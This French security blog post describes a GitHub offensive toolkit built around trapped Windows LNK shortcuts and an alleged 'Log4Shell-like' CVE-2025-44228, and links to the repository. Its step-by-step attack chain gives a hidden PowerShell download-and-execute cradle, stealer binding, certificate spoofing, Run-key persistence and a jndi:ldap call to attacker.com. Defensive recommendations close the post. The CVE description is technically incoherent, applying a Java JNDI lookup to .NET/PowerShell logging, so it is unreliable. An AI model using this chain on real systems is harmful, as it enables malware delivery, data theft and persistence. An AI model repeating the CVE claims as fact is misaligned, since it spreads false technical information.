💣 LNK + CVE-2025-44228 : un combo offensif redoutable livrĂ© sur GitHub

Un dĂ©pĂŽt GitHub publiĂ© en juin 2025 rĂ©vĂšle un combe offensif clĂ©-en-main exploitant la faille CVE-2025-44228 via des raccourcis Windows LNK piĂ©gĂ©s. Ce framework, baptisĂ© Lnk-Exploit-FileBinder-Certificate-Spoofer, combine persistance, Ă©vasion antivirus, injection de certificats et exĂ©cution Ă  distance — une menace sĂ©rieuse pour les environnements Windows encore vulnĂ©rables.

Quand un dĂ©pĂŽt GitHub ne se contente pas de « prouver un concept », mais fournit une suite offensive complĂšte, c’est un signal fort. Le projet Caztemaz/Lnk‑Exploit‑FileBinder‑Certificate‑Spoofer‑Reg‑Doc‑Cve‑Rce en est l’illustration parfaite. PubliĂ© le 21 juin 2025 Ă  22:18:39 Z, ce framework ne joue pas dans la cour des scripts de pentesteurs dĂ©butants — il vise clairement l’exploitation automatisĂ©e, furtive et persistante des environnements Windows.

Ah oui le lien, ça peut vous aider :
Caztemaz / Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce
âžĄïž https://github.com/Caztemaz/Lnk-Exploit-FileBinder-Certificate-Spoofer-Reg-Doc-Cve-Rce


🔍 Une suite offensive multi-Ă©tapes

Ce dĂ©pĂŽt Visual Basic .NET compile un arsenal de fonctionnalitĂ©s offensives rĂ©unies dans un seul outil, avec une ambition claire : bypasser les protections modernes tout en maximisant la persistance sur les machines ciblĂ©es.

Fonctionnalités principales :

  1. 📎 LNK Exploit
    GĂ©nĂšre des raccourcis Windows .lnk piĂ©gĂ©s, capables de lancer des payloads Ă  l’ouverture via des commandes PowerShell ou autres exĂ©cutables, tout en masquant leur intention derriĂšre des icĂŽnes et cibles lĂ©gitimes.
  2. 📩 File Binder
    Permet de fusionner plusieurs fichiers (binaire malveillant + leurre lĂ©gitime) dans un exĂ©cutable unique. TrĂšs utilisĂ© pour dissimuler un RAT ou un stealer dans un fichier d’apparence inoffensive.
  3. 🔐 Certificate Spoofer
    Injecte des certificats forgĂ©s pour donner Ă  l’exĂ©cutable l’apparence d’un fichier signĂ© — trompant ainsi les utilisateurs et certains antivirus.
  4. đŸ› ïž Persistance via registre
    Ajoute automatiquement une clĂ© dans HKCU\Software\Microsoft\Windows\CurrentVersion\Run ou via des tĂąches planifiĂ©es pour relancer le payload Ă  chaque dĂ©marrage.
  5. 📄 Inclusion dans documents
    Injecte le payload dans des fichiers .docx.rtf.xls exploitant des macros ou champs DDE, pour une diffusion via phishing.
  6. 🌐 RCE via CVE-2025‑44228
    Exploite une faille rĂ©cente surnommĂ©e « Log4Shell-like », utilisant des raccourcis .lnk couplĂ©s Ă  des appels rĂ©seau pour exĂ©cuter des commandes Ă  distance silencieusement.
  7. 🧙 Techniques FUD et anti-sandbox
    Contournement d’antivirus avec obfuscation, dĂ©lai Ă  l’exĂ©cution, dĂ©tection d’environnement virtuel pour Ă©viter les sandbox de sandboxie, Cuckoo ou VirusTotal.

đŸ§Ș Mise en Ɠuvre technique (POC)

⚠ Usage strictement rĂ©servĂ© Ă  des environnements de test ou dans le cadre d’un audit autorisĂ©. L’outil est extrĂȘmement dangereux et facilement dĂ©ployable.

Pré-requis

  • VM Windows 10/11 avec droits administrateur
  • .NET Framework 4.8 installĂ©
  • Visual Studio (pour examiner le code)
  • Python 3.x (optionnel pour servir un shell distant)
  • Serveur HTTP Ă  disposition (pour payloads distants)

Exemple de chaüne d’attaque

Étape 1 : GĂ©nĂ©rer le LNK piĂ©gĂ©

powershell
C:\> LnkGen.exe -icon "pdf.ico" -target "powershell.exe" -args "-exec bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.0.5/payload.ps1')"

Le LNK ouvre discrÚtement PowerShell et télécharge un script malveillant.


Étape 2 : Binder un outil lĂ©gitime avec le stealer

bash
FileBinder.exe -f1 "notepad.exe" -f2 "Stealer.exe" -out "NoteLegit.exe"<br>

Étape 3 : Spoofer le certificat du binaire final

bash
CertSpoofer.exe -in "NoteLegit.exe" -cert "signed_dll_template.cer" -out "FinalPayload.exe"

Étape 4 : Ajout au registre (persistance)

powershell
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "OfficeUpdate" /t REG_SZ /d "C:\Users\Public\FinalPayload.exe" /f

Étape 5 : DĂ©clenchement RCE via CVE-2025-44228

Dans le script PowerShell téléchargé :

powershell
Invoke-WebRequest -Uri "http://vuln-target.local/log?msg=${jndi:ldap://attacker.com/callback}"

Cela exploite une faille dans le composant de journalisation (équivalent Java/Log4Shell) vulnérable sur certaines applications .NET ou PowerShell.


💀 Pourquoi c’est problĂ©matique

Ce dĂ©pĂŽt ne se contente pas d’implĂ©menter des outils connus : il les orchestre de maniĂšre fluide, en un pipeline offensif qui :

  • s’infiltre via un fichier anodin
  • bypass les antivirus
  • persiste sur la machine
  • s’exĂ©cute Ă  distance
  • et s’auto-repique via des documents ou d’autres scripts

Le tout avec un README documentĂ©, une licence MIT (donc redistribuable), et des captures d’écran pĂ©dagogiques.


đŸ§© En conclusion : un framework d’exploitation complet

Le dĂ©pĂŽt Caztemaz/Lnk‑Exploit‑
 n’est ni un Proof-of-Concept isolĂ©, ni un simple binder ou un obfuscateur. Il s’agit d’une vĂ©ritable boĂźte Ă  outils offensive prĂȘte Ă  l’emploi, ciblant directement les faiblesses humaines et techniques des environnements Windows.

Il s’inscrit dans la logique post-Log4Shell, oĂč l’exploitation RCE est facilitĂ©e par la combinaison de techniques simples mais efficaces.

⚠ Si vous administrez un parc Windows, ce genre de dĂ©pĂŽt doit servir d’alerte : vos filtres d’extension, vos rĂšgles EDR, votre proxy, vos GPO et votre stratĂ©gie de mises Ă  jour doivent ĂȘtre capables de contrer un tel outil.


đŸ›Ąïž Bonnes pratiques recommandĂ©es :

  • Bloquez l’exĂ©cution des .lnk provenant d’emplacements suspects (GPO, AppLocker).
  • DĂ©sactivez les macros par dĂ©faut et bloquez les formats .rtf.docm par dĂ©faut.
  • Surveillez les requĂȘtes vers des domaines inconnus ou internes via proxy ou IDS.
  • Appliquez en prioritĂ© le correctif de la CVE-2025-44228 sur toutes les applications vulnĂ©rables.
  • Activez le Windows Defender SmartScreen, mĂȘme pour les fichiers locaux.
  • Utilisez un EDR capable de dĂ©tecter les injections PowerShell et les mouvements latĂ©raux.
💣 LNK + CVE-2025-44228 : un combo offensif redoutable livrĂ© sur GitHub
Partager cet article : Twitter LinkedIn WhatsApp

đŸ–‹ïž PubliĂ© sur SecuSlice.com

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Retour en haut